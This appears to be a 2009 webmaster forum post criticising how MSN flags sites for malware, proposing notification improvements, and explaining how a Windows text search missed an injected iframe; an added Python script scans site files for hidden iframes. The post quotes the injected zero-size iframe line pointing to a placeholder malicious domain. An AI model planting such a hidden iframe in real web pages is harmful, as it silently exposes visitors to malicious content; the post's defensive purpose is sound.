MSN fails to HELP webmasters find malware problems on a site

My help to you & Three ways MSN ought to do better in identifying malware.

9:20 pm on Jun 26, 2009 (gmt 0)


MSN does not give any specific identification of the problem that causes them to flag a site for malware. They don't even notify the webmaster that the site is flagged. How lame is that when the solution is so simple?

1) Send an email to "webmaster at domain" and similar standard email addresses, notifying that a problem has been found. Most people check their email more often than the bing.com/webmaster control panel. I believe Google does email a webmaster at domain if a problem is found.

2) Provide a cached copy of the page as the msnbot viewed it. Because of variations ... as with default ad banners ... a webmaster may not be able to see the page the way the msnbot saw it.

3) Identify the specific code that triggered the bot and the malware flag. For Pete's sake, why keep it a secret and leave a webmaster to search for who knows what? Why go on a wild goose chase for endless maybes instead of having a specific phrase that can be found with a search?

Lastly, when I downloaded all my site htm files to check, I used the file search companion in WinXP. In my case, I put in the box for "all files and folders" a "word or phrase in the file" text search within files in the directory for "iframe" with "search subfolders" checked. The search showed up nothing except a legitimate text reference in a file to ...wriframe.html, a legitimate filename. It wasn't until out of frustration I tried a different program to search for those six letters in iframe that I found files that were infected with an iframe injection. I haven't figured out why search companion didn't locate anything.

I also tried a search companion search from another computer on my home network on which I had just wiped the C: drive and reinstalled the operating system.

Darn it! Since writing the last paragraph, I tried a Windows Search Companion text search for the text "cgi?2" - which is another part of the injected iframe code - and it did show up the known infected files, and I even found a previously overlooked file.

So, I put the phrase "infected with an iframe injection" in a file. Search Companion text search for "iframe" found that.

Search Companion still misses "iframe" text in this critical code line:
<body><iframe src="http://DUMMY-MALICIOUS-DOMAIN/in.cgi?2" width="0" height="0" frameborder="0"></iframe>

Anyhow, if you are reading this message because you are searching for help identifying malware in your website files, here is my wisdom .... don't rely on Windows Search Companion to find "iframe" in a line of html code. Use some alternate software.
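A tag-aware scan of downloaded site files, as an added example that is not part of the original post: it parses each file for iframe elements and marks zero-size or hidden ones such as the line quoted above, instead of relying on a plain-text file search. The extension list, the function names and the hidden-frame heuristics are assumptions made for this sketch.

```python
import re
import sys
from html.parser import HTMLParser
from pathlib import Path

WEB_EXTS = {".htm", ".html", ".php", ".asp", ".js"}  # assumed list, adjust to the site

def _is_zero(value):
    """True for sizes such as "0", "0px" or "0%"."""
    return re.fullmatch(r"\s*0+\s*(px|%)?\s*", value or "", re.I) is not None

class IframeFinder(HTMLParser):
    """Collects every <iframe> start tag; tag and attribute names arrive lowercased."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (_is_zero(a.get("width")) or _is_zero(a.get("height"))
                  or "display:none" in style or "visibility:hidden" in style)
        self.hits.append({"line": self.getpos()[0], "src": a.get("src", ""), "hidden": hidden})

def decode(raw):
    """Decode file bytes; a UTF-16 BOM is honoured so such files are not skipped."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

def scan_text(text):
    finder = IframeFinder()
    finder.feed(text)
    finder.close()
    return finder.hits

def scan_tree(root):
    """Map each web file under root to its iframe hits (files without hits are omitted)."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            hits = scan_text(decode(path.read_bytes()))
            if hits:
                report[str(path)] = hits
    return report

if __name__ == "__main__":
    for name, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for h in hits:
            print(f"{name}:{h['line']}: {'HIDDEN ' if h['hidden'] else ''}iframe src={h['src']!r}")
```

Frames that a script writes into the page at load time do not appear as tags in the file, so a text search for a known fragment such as "cgi?2" remains a useful second pass.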